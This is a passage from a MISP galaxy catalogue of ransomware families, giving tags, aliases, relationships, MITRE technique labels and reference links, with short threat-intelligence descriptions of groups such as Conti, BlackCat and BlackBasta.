SpartCrypt

ransomware

The tag is: misp-galaxy:ransomware="SpartCrypt"

Spectre

ransomware

The tag is: misp-galaxy:ransomware="Spectre"

Sphinx

ransomware

The tag is: misp-galaxy:ransomware="Sphinx"

Spiteful Doubletake

ransomware

The tag is: misp-galaxy:ransomware="Spiteful Doubletake"

SpongeBob

ransomware

The tag is: misp-galaxy:ransomware="SpongeBob"

StalinLocker

ransomware

The tag is: misp-galaxy:ransomware="StalinLocker"

Stinger

ransomware

The tag is: misp-galaxy:ransomware="Stinger"

Storm

ransomware

The tag is: misp-galaxy:ransomware="Storm"

StrawHat

ransomware

The tag is: misp-galaxy:ransomware="StrawHat"

Streamer

ransomware

The tag is: misp-galaxy:ransomware="Streamer"

Striked

ransomware

The tag is: misp-galaxy:ransomware="Striked"

Stroman

ransomware

The tag is: misp-galaxy:ransomware="Stroman"

Stupid

ransomware

The tag is: misp-galaxy:ransomware="Stupid"

StupidJapan

ransomware

The tag is: misp-galaxy:ransomware="StupidJapan"

Styver

ransomware

The tag is: misp-galaxy:ransomware="Styver"

Styx

ransomware

The tag is: misp-galaxy:ransomware="Styx"

SuperB

ransomware

The tag is: misp-galaxy:ransomware="SuperB"

SuperCrypt

ransomware

The tag is: misp-galaxy:ransomware="SuperCrypt"

Suri

ransomware

The tag is: misp-galaxy:ransomware="Suri"

Symbiom

ransomware

The tag is: misp-galaxy:ransomware="Symbiom"

SymmyWare

ransomware

The tag is: misp-galaxy:ransomware="SymmyWare"

Syrk

ransomware

The tag is: misp-galaxy:ransomware="Syrk"

SYSDOWN

ransomware

The tag is: misp-galaxy:ransomware="SYSDOWN"

SystemCrypter

ransomware

The tag is: misp-galaxy:ransomware="SystemCrypter"

T1Happy

ransomware

The tag is: misp-galaxy:ransomware="T1Happy"

Takahiro Locker

ransomware

The tag is: misp-galaxy:ransomware="Takahiro Locker"

TBHRanso

ransomware

The tag is: misp-galaxy:ransomware="TBHRanso"

Teamo

ransomware

The tag is: misp-galaxy:ransomware="Teamo"

Tear Dr0p

ransomware

The tag is: misp-galaxy:ransomware="Tear Dr0p"

Technicy

ransomware

The tag is: misp-galaxy:ransomware="Technicy"

TeslaWare

ransomware

The tag is: misp-galaxy:ransomware="TeslaWare"

TFlower

ransomware

The tag is: misp-galaxy:ransomware="TFlower"

The Brotherhood

ransomware

The tag is: misp-galaxy:ransomware="The Brotherhood"

The Magic

ransomware

The tag is: misp-galaxy:ransomware="The Magic"

TheCursedMurderer

ransomware

The tag is: misp-galaxy:ransomware="TheCursedMurderer"

TheDarkEncryptor

ransomware

The tag is: misp-galaxy:ransomware="TheDarkEncryptor"

Thor

ransomware

The tag is: misp-galaxy:ransomware="Thor"

THT

ransomware

The tag is: misp-galaxy:ransomware="THT"

ThunderCrypt

ransomware

The tag is: misp-galaxy:ransomware="ThunderCrypt"

Tk

ransomware

The tag is: misp-galaxy:ransomware="Tk"

Torchwood

ransomware

The tag is: misp-galaxy:ransomware="Torchwood"

TorLocker

ransomware

The tag is: misp-galaxy:ransomware="TorLocker"

TotalWipeOut

ransomware

The tag is: misp-galaxy:ransomware="TotalWipeOut"

TPS1.0

ransomware

The tag is: misp-galaxy:ransomware="TPS1.0"

Trick-Or-Treat

ransomware

The tag is: misp-galaxy:ransomware="Trick-Or-Treat"

Trojan-Syria

ransomware

The tag is: misp-galaxy:ransomware="Trojan-Syria"

TrumpHead

ransomware

The tag is: misp-galaxy:ransomware="TrumpHead"

TurkStatik

ransomware

The tag is: misp-galaxy:ransomware="TurkStatik"

Tyrant

ransomware

The tag is: misp-galaxy:ransomware="Tyrant"

UCCU

ransomware

The tag is: misp-galaxy:ransomware="UCCU"

Ukash

ransomware

The tag is: misp-galaxy:ransomware="Ukash"

Ultimo HT

ransomware

The tag is: misp-galaxy:ransomware="Ultimo HT"

UltraCrypter

ransomware

The tag is: misp-galaxy:ransomware="UltraCrypter"

Unikey

ransomware

The tag is: misp-galaxy:ransomware="Unikey"

Unknown Crypted

ransomware

The tag is: misp-galaxy:ransomware="Unknown Crypted"

Unknown Lock

ransomware

The tag is: misp-galaxy:ransomware="Unknown Lock"

Unknown XTBL

ransomware

The tag is: misp-galaxy:ransomware="Unknown XTBL"

Unlckr

ransomware

The tag is: misp-galaxy:ransomware="Unlckr"

UNNAM3D

ransomware

The tag is: misp-galaxy:ransomware="UNNAM3D"

Unnamed Bin

ransomware

The tag is: misp-galaxy:ransomware="Unnamed Bin"

Unrans

ransomware

The tag is: misp-galaxy:ransomware="Unrans"

UselessDisk

ransomware

The tag is: misp-galaxy:ransomware="UselessDisk"

UselessFiles

ransomware

The tag is: misp-galaxy:ransomware="UselessFiles"

USR0

ransomware

The tag is: misp-galaxy:ransomware="USR0"

Vaca

ransomware

The tag is: misp-galaxy:ransomware="Vaca"

VCrypt

ransomware

The tag is: misp-galaxy:ransomware="VCrypt"

vCrypt1

ransomware

The tag is: misp-galaxy:ransomware="vCrypt1"

VegaLocker

ransomware

The tag is: misp-galaxy:ransomware="VegaLocker"

Velso

ransomware

The tag is: misp-galaxy:ransomware="Velso"

Vendetta

ransomware

The tag is: misp-galaxy:ransomware="Vendetta"

VevoLocker

ransomware

The tag is: misp-galaxy:ransomware="VevoLocker"

VHD

ransomware

The tag is: misp-galaxy:ransomware="VHD"

ViACrypt

ransomware

The tag is: misp-galaxy:ransomware="ViACrypt"

Viagra

ransomware

The tag is: misp-galaxy:ransomware="Viagra"

VideoBelle

ransomware

The tag is: misp-galaxy:ransomware="VideoBelle"

ViiperWare

ransomware

The tag is: misp-galaxy:ransomware="ViiperWare"

Viro

ransomware

The tag is: misp-galaxy:ransomware="Viro"

ViroBotnet

ransomware

The tag is: misp-galaxy:ransomware="ViroBotnet"

VisionCrypt

ransomware

The tag is: misp-galaxy:ransomware="VisionCrypt"

VMola

ransomware

The tag is: misp-galaxy:ransomware="VMola"

VoidCrypt

ransomware

The tag is: misp-galaxy:ransomware="VoidCrypt"

Vulston

ransomware

The tag is: misp-galaxy:ransomware="Vulston"

Waffle

ransomware

The tag is: misp-galaxy:ransomware="Waffle"

Waiting

ransomware

The tag is: misp-galaxy:ransomware="Waiting"

Waldo

ransomware

The tag is: misp-galaxy:ransomware="Waldo"

Wanna Decryptor Portuguese

ransomware

The tag is: misp-galaxy:ransomware="Wanna Decryptor Portuguese"

WannabeHappy

ransomware

The tag is: misp-galaxy:ransomware="WannabeHappy"

WannaCash

ransomware

The tag is: misp-galaxy:ransomware="WannaCash"

WannaDie

ransomware

The tag is: misp-galaxy:ransomware="WannaDie"

WannaPeace

ransomware

The tag is: misp-galaxy:ransomware="WannaPeace"

WannaSpam

ransomware

The tag is: misp-galaxy:ransomware="WannaSpam"

Want Money

ransomware

The tag is: misp-galaxy:ransomware="Want Money"

Wesker

ransomware

The tag is: misp-galaxy:ransomware="Wesker"

WhatAFuck

ransomware

The tag is: misp-galaxy:ransomware="WhatAFuck"

WhyCry

ransomware

The tag is: misp-galaxy:ransomware="WhyCry"

Windows10

ransomware

The tag is: misp-galaxy:ransomware="Windows10"

WininiCrypt

ransomware

The tag is: misp-galaxy:ransomware="WininiCrypt"

Winsecure

ransomware

The tag is: misp-galaxy:ransomware="Winsecure"

WinUpdatesDisabler

ransomware

The tag is: misp-galaxy:ransomware="WinUpdatesDisabler"

WTDI

ransomware

The tag is: misp-galaxy:ransomware="WTDI"

X Locker 5.0

ransomware

The tag is: misp-galaxy:ransomware="X Locker 5.0"

XCry

ransomware

The tag is: misp-galaxy:ransomware="XCry"

XD

ransomware

The tag is: misp-galaxy:ransomware="XD"

XData

ransomware

The tag is: misp-galaxy:ransomware="XData"

XeroWare

ransomware

The tag is: misp-galaxy:ransomware="XeroWare"

Xlockr

ransomware

The tag is: misp-galaxy:ransomware="Xlockr"

XmdXtazX

ransomware

The tag is: misp-galaxy:ransomware="XmdXtazX"

Xncrypt

ransomware

The tag is: misp-galaxy:ransomware="Xncrypt"

XRat

ransomware

The tag is: misp-galaxy:ransomware="XRat"

XRat has relationships with:

  • used-by: misp-galaxy:threat-actor="Kimsuky" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:rat="xRAT" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:tool="xrat" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="XRat" with estimative-language:likelihood-probability="likely"

XyuEncrypt

ransomware

The tag is: misp-galaxy:ransomware="XyuEncrypt"

xXLecXx

ransomware

The tag is: misp-galaxy:ransomware="xXLecXx"

Yatron

ransomware

The tag is: misp-galaxy:ransomware="Yatron"

Yoshikada

ransomware

The tag is: misp-galaxy:ransomware="Yoshikada"

YYYYBJQOQDU

ransomware

The tag is: misp-galaxy:ransomware="YYYYBJQOQDU"

ZariqaCrypt

ransomware

The tag is: misp-galaxy:ransomware="ZariqaCrypt"

Zelta Free

ransomware

The tag is: misp-galaxy:ransomware="Zelta Free"

ZenCrypt

ransomware

The tag is: misp-galaxy:ransomware="ZenCrypt"

Zeoticus

ransomware

The tag is: misp-galaxy:ransomware="Zeoticus"

Zeppelin

ransomware

The tag is: misp-galaxy:ransomware="Zeppelin"

Zero-Fucks

ransomware

The tag is: misp-galaxy:ransomware="Zero-Fucks"

ZeroLocker

ransomware

The tag is: misp-galaxy:ransomware="ZeroLocker"

Zeronine

ransomware

The tag is: misp-galaxy:ransomware="Zeronine"

ZeroRansom

ransomware

The tag is: misp-galaxy:ransomware="ZeroRansom"

Zilla

ransomware

The tag is: misp-galaxy:ransomware="Zilla"

ZimbraCryptor

ransomware

The tag is: misp-galaxy:ransomware="ZimbraCryptor"

ZipLocker

ransomware

The tag is: misp-galaxy:ransomware="ZipLocker"

Zipper

ransomware

The tag is: misp-galaxy:ransomware="Zipper"

Zoldon

ransomware

The tag is: misp-galaxy:ransomware="Zoldon"

ZorgoCry

ransomware

The tag is: misp-galaxy:ransomware="ZorgoCry"

Smaug

ransomware

The tag is: misp-galaxy:ransomware="Smaug"

GammA

ransomware

The tag is: misp-galaxy:ransomware="GammA"

BlackMoon

ransomware

The tag is: misp-galaxy:ransomware="BlackMoon"

MilkmanVictory

ransomware

The tag is: misp-galaxy:ransomware="MilkmanVictory"

Dragoncyber

ransomware

The tag is: misp-galaxy:ransomware="Dragoncyber"

Solider

ransomware

The tag is: misp-galaxy:ransomware="Solider"

Biglock

ransomware

The tag is: misp-galaxy:ransomware="Biglock"

Immuni

ransomware

The tag is: misp-galaxy:ransomware="Immuni"

Black claw

ransomware

The tag is: misp-galaxy:ransomware="Black claw"

Banks1

ransomware

The tag is: misp-galaxy:ransomware="Banks1"

UnluckyWare

ransomware

The tag is: misp-galaxy:ransomware="UnluckyWare"

Zorab

ransomware

The tag is: misp-galaxy:ransomware="Zorab"

FonixCrypter

ransomware

The tag is: misp-galaxy:ransomware="FonixCrypter"

LickyAgent

ransomware

The tag is: misp-galaxy:ransomware="LickyAgent"

DualShot

ransomware

The tag is: misp-galaxy:ransomware="DualShot"

RNS

ransomware

The tag is: misp-galaxy:ransomware="RNS"

Such_Crypt

ransomware

The tag is: misp-galaxy:ransomware="Such_Crypt"

20dfs

ransomware

The tag is: misp-galaxy:ransomware="20dfs"

CryDroid

ransomware

The tag is: misp-galaxy:ransomware="CryDroid"

TomNom

ransomware

The tag is: misp-galaxy:ransomware="TomNom"

Yogynicof

ransomware

The tag is: misp-galaxy:ransomware="Yogynicof"

CobraLocker

ransomware

The tag is: misp-galaxy:ransomware="CobraLocker"

PL

ransomware

The tag is: misp-galaxy:ransomware="PL"

CryCryptor

ransomware

The tag is: misp-galaxy:ransomware="CryCryptor"

Blocky

ransomware

The tag is: misp-galaxy:ransomware="Blocky"

OhNo-FakePDF

ransomware

The tag is: misp-galaxy:ransomware="OhNo-FakePDF"

Try2Cry

ransomware

The tag is: misp-galaxy:ransomware="Try2Cry"

LolKek

ransomware

The tag is: misp-galaxy:ransomware="LolKek"

FlowEncrypt

ransomware

The tag is: misp-galaxy:ransomware="FlowEncrypt"

WhoLocker

ransomware

The tag is: misp-galaxy:ransomware="WhoLocker"

Pojie

ransomware

The tag is: misp-galaxy:ransomware="Pojie"

Aris Locker

ransomware

The tag is: misp-galaxy:ransomware="Aris Locker"

EduRansom

ransomware

The tag is: misp-galaxy:ransomware="EduRansom"

Fastwind

ransomware

The tag is: misp-galaxy:ransomware="Fastwind"

Silvertor

ransomware

The tag is: misp-galaxy:ransomware="Silvertor"

Exorcist

ransomware

The tag is: misp-galaxy:ransomware="Exorcist"

WyvernLocker

ransomware

The tag is: misp-galaxy:ransomware="WyvernLocker"

Ensiko

ransomware

The tag is: misp-galaxy:ransomware="Ensiko"

Django

ransomware

The tag is: misp-galaxy:ransomware="Django"

RansomBlox

ransomware

The tag is: misp-galaxy:ransomware="RansomBlox"

BitRansomware

ransomware

The tag is: misp-galaxy:ransomware="BitRansomware"

AESMew

ransomware

The tag is: misp-galaxy:ransomware="AESMew"

DeathOfShadow

ransomware

The tag is: misp-galaxy:ransomware="DeathOfShadow"

XMRLocker

ransomware

The tag is: misp-galaxy:ransomware="XMRLocker"

WinWord64

ransomware

The tag is: misp-galaxy:ransomware="WinWord64"

ThunderX

ransomware

The tag is: misp-galaxy:ransomware="ThunderX"

Mountlocket

ransomware

The tag is: misp-galaxy:ransomware="Mountlocket"

Mountlocket has relationships with:

  • similar: misp-galaxy:ransomware="QuantumLocker" with estimative-language:likelihood-probability="likely"

Table 8585. Table References

Links

https://howtofix.guide/ransom-mountlocket/

Gladius

ransomware

The tag is: misp-galaxy:ransomware="Gladius"

Cyrat

ransomware

The tag is: misp-galaxy:ransomware="Cyrat"

Crypt32

ransomware

The tag is: misp-galaxy:ransomware="Crypt32"

BizHack

ransomware

The tag is: misp-galaxy:ransomware="BizHack"

Geneve

ransomware

The tag is: misp-galaxy:ransomware="Geneve"

Z3

ransomware

The tag is: misp-galaxy:ransomware="Z3"

Leakthemall

ransomware

The tag is: misp-galaxy:ransomware="Leakthemall"

Conti

Conti ransomware is a RaaS and has been observed encrypting networks since mid-2020. Conti was developed by the “TrickBot” group, an organized Russian cybercriminal operation. Their reputation has allowed the group to create a strong brand name, attracting many affiliates which has made Conti one of the most widespread ransomware strains in the world. One of the last known “Conti” attacks was against the government of Costa Rica in April 2022 causing the country to declare a state of emergency. Shortly after this final attack, the “Conti” brand disappeared. The group behind it likely switched to a different brand to avoid sanctions and start over with a new, clean reputation.

The tag is: misp-galaxy:ransomware="Conti"

Conti has relationships with:

  • parent-of: misp-galaxy:ransomware="QuantumLocker" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:ransomware="BlackBasta" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:ransomware="BlackByte" with estimative-language:likelihood-probability="likely"

Table 8586. Table References

Links

https://www.cyber.gov.au/acsc/view-all-content/advisories/2021-010-acsc-ransomware-profile-conti

https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/787/original/ransomware-chats.pdf?1651576098

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-virtual-machines

Makop

ransomware

The tag is: misp-galaxy:ransomware="Makop"

Best Crypt

ransomware

The tag is: misp-galaxy:ransomware="Best Crypt"

Consciousness

ransomware

The tag is: misp-galaxy:ransomware="Consciousness"

Flamingo

ransomware

The tag is: misp-galaxy:ransomware="Flamingo"

PewPew

ransomware

The tag is: misp-galaxy:ransomware="PewPew"

DogeCrypt

ransomware

The tag is: misp-galaxy:ransomware="DogeCrypt"

Badbeeteam

ransomware

The tag is: misp-galaxy:ransomware="Badbeeteam"

Solve

ransomware

The tag is: misp-galaxy:ransomware="Solve"

RenameX12

ransomware

The tag is: misp-galaxy:ransomware="RenameX12"

Zhen

ransomware

The tag is: misp-galaxy:ransomware="Zhen"

Datacloud

ransomware

The tag is: misp-galaxy:ransomware="Datacloud"

Ironcat

ransomware

The tag is: misp-galaxy:ransomware="Ironcat"

Dusk

ransomware

The tag is: misp-galaxy:ransomware="Dusk"

Cutekitty

ransomware

The tag is: misp-galaxy:ransomware="Cutekitty"

Babax

ransomware

The tag is: misp-galaxy:ransomware="Babax"

Eyecry

ransomware

The tag is: misp-galaxy:ransomware="Eyecry"

Osno

ransomware

The tag is: misp-galaxy:ransomware="Osno"

Loki

ransomware

The tag is: misp-galaxy:ransomware="Loki"

WoodRat

ransomware

The tag is: misp-galaxy:ransomware="WoodRat"

Curator

ransomware

The tag is: misp-galaxy:ransomware="Curator"

32aa

ransomware

The tag is: misp-galaxy:ransomware="32aa"

Vaggen

ransomware

The tag is: misp-galaxy:ransomware="Vaggen"

Clay

ransomware

The tag is: misp-galaxy:ransomware="Clay"

Pizhon

ransomware

The tag is: misp-galaxy:ransomware="Pizhon"

InstallPay

ransomware

The tag is: misp-galaxy:ransomware="InstallPay"

MetadataBin

ransomware

The tag is: misp-galaxy:ransomware="MetadataBin"

TechandStrat

ransomware

The tag is: misp-galaxy:ransomware="TechandStrat"

Mars

ransomware

The tag is: misp-galaxy:ransomware="Mars"

Scatterbrain

ransomware

The tag is: misp-galaxy:ransomware="Scatterbrain"

CCECrypt

ransomware

The tag is: misp-galaxy:ransomware="CCECrypt"

SZ40

ransomware

The tag is: misp-galaxy:ransomware="SZ40"

Pay2Key

ransomware

The tag is: misp-galaxy:ransomware="Pay2Key"

Tripoli

ransomware

The tag is: misp-galaxy:ransomware="Tripoli"

Devos

ransomware

The tag is: misp-galaxy:ransomware="Devos"

HowAreYou

ransomware

The tag is: misp-galaxy:ransomware="HowAreYou"

SifreCikis

ransomware

The tag is: misp-galaxy:ransomware="SifreCikis"

68-Random-HEX

ransomware

The tag is: misp-galaxy:ransomware="68-Random-HEX"

RedRoman

ransomware

The tag is: misp-galaxy:ransomware="RedRoman"

MXX

ransomware

The tag is: misp-galaxy:ransomware="MXX"

Exerwa CTF

ransomware

The tag is: misp-galaxy:ransomware="Exerwa CTF"

HelloKitty

ransomware

The tag is: misp-galaxy:ransomware="HelloKitty"

HelloKitty is also known as:

  • FiveHands

HolidayCheer

ransomware

The tag is: misp-galaxy:ransomware="HolidayCheer"

Joker Korean

ransomware

The tag is: misp-galaxy:ransomware="Joker Korean"

VenomRAT

ransomware

The tag is: misp-galaxy:ransomware="VenomRAT"

FileEngineering

ransomware

The tag is: misp-galaxy:ransomware="FileEngineering"

LandSlide

ransomware

The tag is: misp-galaxy:ransomware="LandSlide"

Mobef-JustFun

ransomware

The tag is: misp-galaxy:ransomware="Mobef-JustFun"

Mobef-JustFun has relationships with:

  • similar: misp-galaxy:ransomware="Mobef" with estimative-language:likelihood-probability="likely"

Amjixius

ransomware

The tag is: misp-galaxy:ransomware="Amjixius"

Amjixius is also known as:

  • Ancrypted

Table 8587. Table References

Links

https://malware-guide.com/blog/remove-amjixius-ransomware-restore-encrypted-files

DearCry

ransomware

The tag is: misp-galaxy:ransomware="DearCry"

JoJoCrypter

ransomware

The tag is: misp-galaxy:ransomware="JoJoCrypter"

RunExeMemory

ransomware

The tag is: misp-galaxy:ransomware="RunExeMemory"

Pay2Decrypt

ransomware

The tag is: misp-galaxy:ransomware="Pay2Decrypt"

Tortoise

ransomware

The tag is: misp-galaxy:ransomware="Tortoise"

EPICALLY

ransomware

The tag is: misp-galaxy:ransomware="EPICALLY"

Random30

ransomware

The tag is: misp-galaxy:ransomware="Random30"

Hog

ransomware

The tag is: misp-galaxy:ransomware="Hog"

Steel

ransomware

The tag is: misp-galaxy:ransomware="Steel"

JohnBorn

ransomware

The tag is: misp-galaxy:ransomware="JohnBorn"

Egalyty

ransomware

The tag is: misp-galaxy:ransomware="Egalyty"

Namaste

ransomware

The tag is: misp-galaxy:ransomware="Namaste"

HDLocker

ransomware

The tag is: misp-galaxy:ransomware="HDLocker"

Epsilon

ransomware

The tag is: misp-galaxy:ransomware="Epsilon"

DeroHE

ransomware

The tag is: misp-galaxy:ransomware="DeroHE"

Vovalex

ransomware

The tag is: misp-galaxy:ransomware="Vovalex"

Bonsoir

ransomware

The tag is: misp-galaxy:ransomware="Bonsoir"

PulpFictionQuote

ransomware

The tag is: misp-galaxy:ransomware="PulpFictionQuote"

NAS Data Compromiser

ransomware

The tag is: misp-galaxy:ransomware="NAS Data Compromiser"

CNH

ransomware

The tag is: misp-galaxy:ransomware="CNH"

Lucy

ransomware

The tag is: misp-galaxy:ransomware="Lucy"

OCT

ransomware

The tag is: misp-galaxy:ransomware="OCT"

OCT is also known as:

  • OctEncrypt

Pump

ransomware

The tag is: misp-galaxy:ransomware="Pump"

LuciferCrypt

ransomware

The tag is: misp-galaxy:ransomware="LuciferCrypt"

Ziggy

ransomware

The tag is: misp-galaxy:ransomware="Ziggy"

CoderCrypt

ransomware

The tag is: misp-galaxy:ransomware="CoderCrypt"

BlueEagle

ransomware

The tag is: misp-galaxy:ransomware="BlueEagle"

Povisomware

ransomware

The tag is: misp-galaxy:ransomware="Povisomware"

JCrypt

Ransomware written in C#. Fortunately, all current versions of the MafiaWare666 ransomware are decryptable. The Threat Lab from Avast has developed a free decryption tool for this malware.

The tag is: misp-galaxy:ransomware="JCrypt"

JCrypt is also known as:

  • RIP lmao

  • Locked

  • Daddycrypt

  • Omero

  • Crypted

  • Ncovid

  • NotStonks

  • Iam_watching

  • Vn_os

  • Wearefriends

  • MALWAREDEVELOPER

  • MALKI

  • Poison

  • Foxxy

  • Mafiaware666

Table 8588. Table References

Links

https://id-ransomware.blogspot.com/2020/12/jcrypt-ransomware.html

https://twitter.com/kangxiaopao/status/1342027328063295488?lang=en

https://twitter.com/demonslay335/status/1380610583603638277

https://decoded.avast.io/threatresearch/decrypted-mafiaware666-ransomware/

https://files.avast.com/files/decryptor/avast_decryptor_mafiaware666.exe

Uh-Oh

ransomware

The tag is: misp-galaxy:ransomware="Uh-Oh"

Mijnal

ransomware

The tag is: misp-galaxy:ransomware="Mijnal"

16x

The tag is: misp-galaxy:ransomware="16x"

Lockedv1

ransomware

The tag is: misp-galaxy:ransomware="Lockedv1"

XD Locker

ransomware

The tag is: misp-galaxy:ransomware="XD Locker"

Knot

ransomware

The tag is: misp-galaxy:ransomware="Knot"

Parasite

ransomware

The tag is: misp-galaxy:ransomware="Parasite"

Judge

ransomware

The tag is: misp-galaxy:ransomware="Judge"

DEcovid19

ransomware

The tag is: misp-galaxy:ransomware="DEcovid19"

Ragnarok

Ragnarok is is a ransomware that targetscorporate networks in Big Game Huntingtargeted attacks. The ransomware is associated with 'double-extortion' tactic, stealing and publishing files on a data leak site (DLS).

The tag is: misp-galaxy:ransomware="Ragnarok"

Table 8589. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.ragnaro

https://borncity.com/win/2021/03/27/tu-darmstadt-opfer-der-ragnarok-ransomware/

BlackCat

BlackCat (ALPHV) is ransomware written in Rust. The ransomware makes heavy use of plaintext JSON configuration files to specify the ransomware functionality. BlackCat has many advanced capabilities like escalating privileges and bypassing UAC make use of AES and ChaCha20 or Salsa encryption, may use the Restart Manager, can delete volume shadow copies, can enumerate disk volumes and network shares automatically, and may kill specific processes and services. The ransomware exists for both Windows, Linux, and ESXi systems. Multiple extortion techniques are used by the BlackCat gang, such as exfiltrating victim data before the ransomware deployment, threats to release data if the ransomw is not paid, and distributed denial-of-service (DDoS) attacks.

The tag is: misp-galaxy:ransomware="BlackCat"

BlackCat is also known as:

  • ALPHV

  • Noberus

BlackCat has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Service Execution - T1569.002" with estimative-language:likelihood-probability="almost-certain"

  • uses: misp-galaxy:mitre-attack-pattern="Cron - T1053.003" with estimative-language:likelihood-probability="almost-certain"

  • uses: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation - T1047" with estimative-language:likelihood-probability="almost-certain"

  • uses: misp-galaxy:mitre-attack-pattern="Shared Modules - T1129" with estimative-language:likelihood-probability="almost-certain"

  • uses: misp-galaxy:mitre-attack-pattern="LLMNR/NBT-NS Poisoning and SMB Relay - T1557.001" with estimative-language:likelihood-probability="almost-certain"

  • uses: misp-galaxy:mitre-attack-pattern="LSA Secrets - T1003.004" with estimative-language:likelihood-probability="almost-certain"

  • uses: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"

  • uses: misp-galaxy:mitre-attack-pattern="CMSTP - T1218.003" with estimative-language:likelihood-probability="almost-certain"

  • uses: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"

  • uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"

  • uses: misp-galaxy:mitre-attack-pattern="System Network Connections Discovery - T1049" with estimative-language:likelihood-probability="almost-certain"

  • uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

  • uses: misp-galaxy:mitre-attack-pattern="Exfiltration Over Web Service - T1567" with estimative-language:likelihood-probability="almost-certain"

  • uses: misp-galaxy:mitre-attack-pattern="Inhibit System Recovery - T1490" with estimative-language:likelihood-probability="almost-certain"

  • uses: misp-galaxy:mitre-attack-pattern="Data Destruction - T1485" with estimative-language:likelihood-probability="almost-certain"

  • uses: misp-galaxy:mitre-attack-pattern="Service Stop - T1489" with estimative-language:likelihood-probability="almost-certain"

  • uses: misp-galaxy:mitre-attack-pattern="Data Encrypted for Impact - T1486" with estimative-language:likelihood-probability="almost-certain"

  • uses: misp-galaxy:mitre-attack-pattern="Network Denial of Service - T1498" with estimative-language:likelihood-probability="almost-certain"

  • uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"

  • uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"

  • uses: misp-galaxy:mitre-attack-pattern="Lateral Tool Transfer - T1570" with estimative-language:likelihood-probability="almost-certain"

  • uses: misp-galaxy:mitre-attack-pattern="Multi-hop Proxy - T1090.003" with estimative-language:likelihood-probability="almost-certain"

  • uses: misp-galaxy:mitre-attack-pattern="Exfiltration to Cloud Storage - T1567.002" with estimative-language:likelihood-probability="almost-certain"

  • uses: misp-galaxy:mitre-attack-pattern="Network Denial of Service - T1498" with estimative-language:likelihood-probability="almost-certain"

Table 8591. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.blackcat

https://1-id—​ransomware-blogspot-com.translate.goog/2021/12/blackcat-ransomware.html?_x_tr_enc=1&_x_tr_sl=ru&_x_tr_tl=en&_x_tr_hl=ru

https://medium.com/s2wblog/blackcat-new-rust-based-ransomware-borrowing-blackmatters-configuration-31c8d330a809

https://github.com/f0wl/blackCatConf

https://www.sentinelone.com/labs/blackcat-ransomware-highly-configurable-rust-driven-raas-on-the-prowl-for-victims/

https://www.varonis.com/blog/alphv-blackcat-ransomware

https://www.intrinsec.com/alphv-ransomware-gang-analysis

https://unit42.paloaltonetworks.com/blackcat-ransomware/

https://www.cyber.gov.au/acsc/view-all-content/advisories/2022-004-acsc-ransomware-profile-alphv-aka-blackcat

https://www.microsoft.com/en-us/security/blog/2022/06/13/the-many-lives-of-blackcat-ransomware/

Mount Locker

Ransomware

The tag is: misp-galaxy:ransomware="Mount Locker"

Mount Locker is also known as:

  • Mount-Locker

Table 8592. Table References

Links

https://www.cyclonis.com/mount-locker-ransomware-more-dangerous

https://www.bleepingcomputer.com/news/security/mount-locker-ransomware-joins-the-multi-million-dollar-ransom-game

Pandora

Ransomware

The tag is: misp-galaxy:ransomware="Pandora"

Table 8594. Table References

Links

https://twitter.com/malwrhunterteam/status/1501857263493001217

https://dissectingmalwa.re/blog/pandora

HelloXD

HelloXD is a ransomware family performing double extortion attacks that surfaced in November 2021. During our research we observed multiple variants impacting Windows and Linux systems. Unlike other ransomware groups, this ransomware family doesn’t have an active leak site; instead it prefers to direct the impacted victim to negotiations through TOX chat and onion-based messenger instances.

The tag is: misp-galaxy:ransomware="HelloXD"

Table 8596. Table References

Links

https://unit42.paloaltonetworks.com/helloxd-ransomware/

Maui ransomware

Maui ransomware stand out because of a lack of several key features commonly seen with tooling from RaaS providers, such as an embedded ransom note to provide recovery instructions or automated means of transmitting encryption keys to attackers. Instead, it is believed that Maui is manually operated, in which operators will specify which files to encrypt when executing it and then exfiltrate the resulting runtime artifacts. There are many aspects to Maui ransomware that are unknown, including usage context.

The tag is: misp-galaxy:ransomware="Maui ransomware"

Table 8597. Table References

Links

https://stairwell.com/wp-content/uploads/2022/07/Stairwell-Threat-Report-Maui-Ransomware.pdf

https://www.cisa.gov/uscert/ncas/alerts/aa22-187a

Lorenz Ransomware

Lorenz is a ransomware group that has been active since at least February 2021 and like many ransomware groups, performs double-extortion by exfiltrating data before encrypting systems.

The tag is: misp-galaxy:ransomware="Lorenz Ransomware"

Table 8598. Table References

Links

https://arcticwolf.com/resources/blog/lorenz-ransomware-chiseling-in/

BlackBasta

Black Basta is a new ransomware strain discovered during April 2022 - looks in dev since at least early February 2022 - and due to their ability to quickly amass new victims and the style of their negotiations, this is likely not a new operation but rather a rebrand of a previous top-tier ransomware gang that brought along their affiliates.

The tag is: misp-galaxy:ransomware="BlackBasta"

BlackBasta has relationships with:

  • successor-of: misp-galaxy:ransomware="Conti" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:botnet="Qbot" with estimative-language:likelihood-probability="likely"

Table 8601. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.blackbasta

https://www.bleepingcomputer.com/news/security/american-dental-association-hit-by-new-black-basta-ransomware/

https://www.bleepingcomputer.com/news/security/new-black-basta-ransomware-springs-into-action-with-a-dozen-breaches/

https://www.trendmicro.com/en_us/research/22/e/examining-the-black-basta-ransomwares-infection-routine.html

